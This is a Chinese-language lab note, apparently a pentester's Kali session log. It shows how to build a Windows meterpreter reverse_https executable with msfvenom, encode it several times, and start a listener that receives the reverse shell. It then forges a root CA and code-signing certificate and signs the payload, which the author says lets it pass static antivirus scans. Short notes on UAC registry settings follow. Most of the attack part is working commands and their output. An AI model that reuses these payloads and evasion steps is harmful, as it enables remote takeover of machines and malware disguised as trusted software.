本地生成根证书并对文件打签名

msfvenom -p windows/meterpreter/reverse_https -f exe -o 0x7c.exe LHOST=192.168.33.123 LPORT=443


root@kali:~/Lab/0x7c.com# msfvenom -p windows/meterpreter/reverse_https -f exe -o 0x7c.exe LHOST=192.168.33.123 LPORT=443
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 496 bytes
Saved as: 0x7c.exe


msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.33.123 LPORT=443 -f exe -o 0x7chttps.exe
root@kali:~/Lab/0x7c.com# msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -i 5  LHOST=192.168.0.123 LPORT=443 -a x86 --platform win -f raw | msfvenom -e x86/alpha_upper -i 3 -a x86 --platform win -f exe -o 0x7cmix.exe

root@kali:~/Lab/0x7c.com# msfconsole
msf > use exploit/multi/
Display all 217 possibilities? (y or n)
msf > use exploit/multi/handler
msf exploit(handler) > set Payload windows/meterpreter/reverse_https
Payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.33.123
LHOST => 192.168.33.123
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...

对文件打签名。
有时候对程序打一个签名即可过了静态扫描,既然未被认证的无效签名。

tools:https://github.com/stufus/certerator

所有的证书都是使用OpenSSL来签名. 但生成过程比较繁琐,所以有这个工具来帮助一键生成证书相关文件。
当ca.pem不存在时,根据配置来生成一个认证证书。
CA PEM证书存放在ca.pem,CA DER证书存放在ca.der文件,私钥存放在ca.key文件。而这些个文件最终都会被打包成一个PKCS12文件,生成ca.p12文件,密码是mwr.但如果提供了ca.pem,就会使用它来进行签名。
当cert.pem不存在时,会根据配置参数来生成一个,其中PEM证书保存为为cert.pem,私钥存为cert.key,同样的所有这些文件会被打包成cert.p12.而如果提供了cert.pem,这步会跳过。
最终利用OSSLSign或SignTool.exe来对程序进行签名。

生成签名证书的配置文件在脚本的头部:

def certerator_config():
    ca = {}
    cert = {}

    ca['commonName'] = "0x7c Test Lab Root Authority"
    ca['stateOrProvinceName'] = "Hampshire"
    ca['localityName'] = "Basingstoke"
    ca['organizationName'] = "0x7c Lab"
    ca['organizationalUnitName'] = "Certification Authority"
    ca['emailAddress'] = "labs@0x7c.com"
    ca['countryName'] = "GB"
    ca['cert_filename'] = "ca.pem"
    ca['cert_der'] = "ca.cer"
    ca['cert_p12'] = "ca.p12"
    ca['cert_key'] = "ca.key"
    ca['serial'] = 123456
    ca['validfrom'] = "20100101000000Z"
    ca['validto'] = "20200101000000Z"
    ca['keyfilesize'] = 4096
    ca['hashalgorithm'] = "sha256"

    cert['commonName'] = "360 Test Lab Code Signing Verifier"
    cert['stateOrProvinceName'] = "Hampshire"
    cert['localityName'] = "Basingstoke"
    cert['organizationName'] = "0x7c.com"
    cert['organizationalUnitName'] = "Code Management"
    cert['emailAddress'] = "labs@0x7c.com"
    cert['countryName'] = "GB"
    cert['cert_filename'] = "cert.pem"
    cert['cert_key'] = "cert.key"
    cert['cert_csr'] = "cert.csr"
    cert['cert_p12'] = "cert.p12"
    cert['serial'] = 234567
    cert['validfrom'] = "20150101000000Z"
    cert['validto'] = "20180101000000Z"
    cert['keyfilesize'] = 4096
    cert['hashalgorithm'] = "sha256"

    return ca, cert
root@kali:~/Lab/0x7c.com/certerator-master# ls
certerator.py  ev  LICENCE.md  README.md  reg2cmd.py
root@kali:~/Lab/0x7c.com/certerator-master# python certerator.py

       .mMMMMMm.             MMm    M   WW   W   WW   RRRRR
      mMMMMMMMMMMM.           MM   MM    W   W   W    R   R
     /MMMM-    -MM.           MM   MM    W   W   W    R   R
    /MMM.    _  \/  ^         M M M M     W W W W     RRRR
    |M.    aRRr    /W|        M M M M     W W W W     R  R
    \/  .. ^^^   wWWW|        M  M  M      W   W      R   R
       /WW\.  .wWWWW/         M  M  M      W   W      R    R
       |WWWWWWWWWWW/
         .WWWWWW.      Certerator (Code Signing Certificate Generator)
                        stuart.morgan@mwrinfosecurity.com | @ukstufus

Generating new CA.....done
 Written PEM CA certificate to ca.pem
 Written DER CA certificate to ca.cer
 Written CA private key to ca.key
 Written CA PKCS12 (private key and certificate) to ca.p12
 SHA1 CA Fingerprint: 86:07:EA:51:5C:53:0A:7B:19:A0:2B:3D:E4:F1:52:DF:C1:AC:5E:EE
Generating new signing certificate.....done
 Written CSR certificate request to cert.csr
 Written PEM certificate to cert.pem
 Written private key to cert.key
 Written PKCS12 (private key and certificate) to cert.p12
 SHA1 Cert Fingerprint: 36:76:FB:CC:E7:B6:13:A5:F9:A0:BD:FB:05:75:48:E6:8A:91:D2:BF

Linux/UNIX:

osslsigncode -pkcs12 cert.p12 -pass mwr -in in.exe -out out.exe

Windows:

signtool.exe sign /f cert.p12 /p mwr in.exe
root@kali:~/Lab/0x7c.com/certerator-master# ls
ca.cer  ca.key  ca.p12  ca.pem  cert.csr  certerator.py  cert.key  cert.p12  cert.pem  ev  LICENCE.md  README.md  reg2cmd.py
root@kali:~/Lab/0x7c.com/certerator-master#

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ls
aclocal.m4  ChangeLog  compile  config.h.in  configure  configure.ac  COPYING  depcomp  install-sh  Makefile.am  Makefile.in  missing  osslsigncode.c  README  TODO
root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking whether gcc understands -c and -o together... yes
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking minix/config.h usability... no
checking minix/config.h presence... no
checking for minix/config.h... no
checking whether it is safe to define __EXTENSIONS__... yes
checking for pkg-config... no
checking how to run the C preprocessor... gcc -E
checking whether ln -s works... yes
checking for a sed that does not truncate output... /bin/sed
checking whether make sets $(MAKE)... (cached) yes
checking for an ANSI C-conforming const... yes
checking for ANSI C header files... (cached) yes
checking whether time.h and sys/time.h may both be included... yes
checking sys/mman.h usability... yes
checking sys/mman.h presence... yes
checking for sys/mman.h... yes
checking for mmap... yes
checking windows.h usability... no
checking windows.h presence... no
checking for windows.h... no
checking for dlopen in -ldl... yes
checking termios.h usability... yes
checking termios.h presence... yes
checking for termios.h... yes
checking for getpass... yes
checking for GSF... no
checking for OPENSSL... no
checking for OPENSSL... no
checking for RSA_verify in -lcrypto... no
configure: error: OpenSSL 0.9.8 or later is required. http://www.openssl.org/

解决

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# apt-get install libssl-dev

再出错

checking for getpass... yes
checking for GSF... no
checking for OPENSSL... no
checking for OPENSSL... no
checking for RSA_verify in -lcrypto... yes
checking for LIBCURL... no
checking for curl_easy_strerror in -lcurl... no
configure: error: Curl 7.12.0 or later is required for timestamping support. http://curl.haxx.se/

再解决

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# apt-get install libcurl4-openssl-dev

最后编译执行

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ./osslsigncode -certs cert.pem -key cert.key -in 0x7c.exe -out 0x7c-sign.exe
Succeeded

Windows

d:\sign>"C:\Program Files (x86)\Windows Kits\10\bin\x86\signtool.exe" sign /f cert.p12 /p mwr 0x7c.exe
Done Adding Additional Store
Successfully signed: 0x7c.exe

虽然签名了,但是签名因为CA是我们自己做的,不被承认的,所以是无效的。但可以将CA导入到机器中,签名就可以显示有效。可以骗过一些个杀软。
引用:
http://www.i0day.com/1173.html
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/

启动UAC

1,对于Administrator这个帐户,UAC是关闭的.

但默认不启动,启动命令:

net user administrator /active:yes

 

对于注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

  • FilterAdministratorToken 默认是0,表示administrator帐户,UAC为关闭的.改为1的话,即使当前用户为administrator也是在需要管理员权限时要弹UAC出来的.
  • PromptOnSecureDesktop 默认为1,即在安全的新桌面显示UAC框,如果为0,则在当前交互的桌面弹UAC框.